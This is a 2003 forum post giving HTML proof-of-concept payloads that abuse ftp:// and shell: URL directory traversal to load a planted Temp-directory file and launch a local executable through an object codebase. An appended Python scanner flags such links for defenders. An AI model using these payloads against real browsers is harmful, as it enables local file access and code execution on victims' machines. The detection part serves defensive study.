NI3
10-23-2003, 04:21 PM
The following proof-of-concept was provided:
[ftpexp.html]
<html>
<a href="ftp://%@/../../../../Local Settings/Temp/exploit.html" TYPE="text/html" target="_blank">Exploit</a>
</html>
The user must click the exploit link, which loads the following file (which must exist in the user's Temp directory):
[exploit.html]
<html>
<script>setTimeout(function(){document.body.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="file://c:/winnt/notepad.exe"></object>'}, 0);</script>
</html>
The following will read the file %TEMP%\exploit.html on a Windows 2003 system:
<a href="shell:cache\..\..\Local Settings\Temp\exploit.html">Exploit</a>
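As an added example (not part of NI3's post), here is a small Python scanner a defender could run over captured HTML to flag the link and object forms shown above: a local scheme (shell:, file:), an ftp URL whose userinfo is the odd "%@", and ".." directory climbing in the path. The sample markup is constructed from the post; the function and class names are my own.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote

# Constructed sample: the three references from the post plus one benign link.
SAMPLE_HTML = """
<a href="ftp://%@/../../../../Local Settings/Temp/exploit.html" TYPE="text/html" target="_blank">Exploit</a>
<a href="shell:cache\\..\\..\\Local Settings\\Temp\\exploit.html">Exploit</a>
<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="file://c:/winnt/notepad.exe"></object>
<a href="https://example.invalid/page.html">ok</a>
"""

# A ".." segment bounded by a slash (or the string start/end).
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")


def assess_reference(value):
    """Return the list of reasons a URL-valued attribute looks like a local-resource reference."""
    reasons = []
    parts = urlsplit(value.strip())
    scheme = parts.scheme.lower()
    if scheme in ("shell", "file"):
        reasons.append("local scheme " + scheme + ":")
    # ftp URL with an empty or bare-"%" userinfo before the "@", as in the post
    if scheme == "ftp" and "@" in parts.netloc and parts.netloc.split("@")[0] in ("", "%"):
        reasons.append("ftp URL with empty/percent userinfo")
    # Normalise backslashes and percent-encoding before looking for ".." segments
    decoded = unquote(value.replace("\\", "/"))
    if TRAVERSAL.search(decoded):
        reasons.append("directory traversal ('..')")
    return reasons


class LocalResourceLinkFinder(HTMLParser):
    """Collect (tag, attribute, value, reasons) for href/src/codebase attributes that match."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:  # html.parser already lowercases attribute names
            if name not in ("href", "src", "codebase") or value is None:
                continue
            reasons = assess_reference(value)
            if reasons:
                self.findings.append((tag, name, value, reasons))


def find_local_resource_links(html):
    parser = LocalResourceLinkFinder()
    parser.feed(html)
    return parser.findings
```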
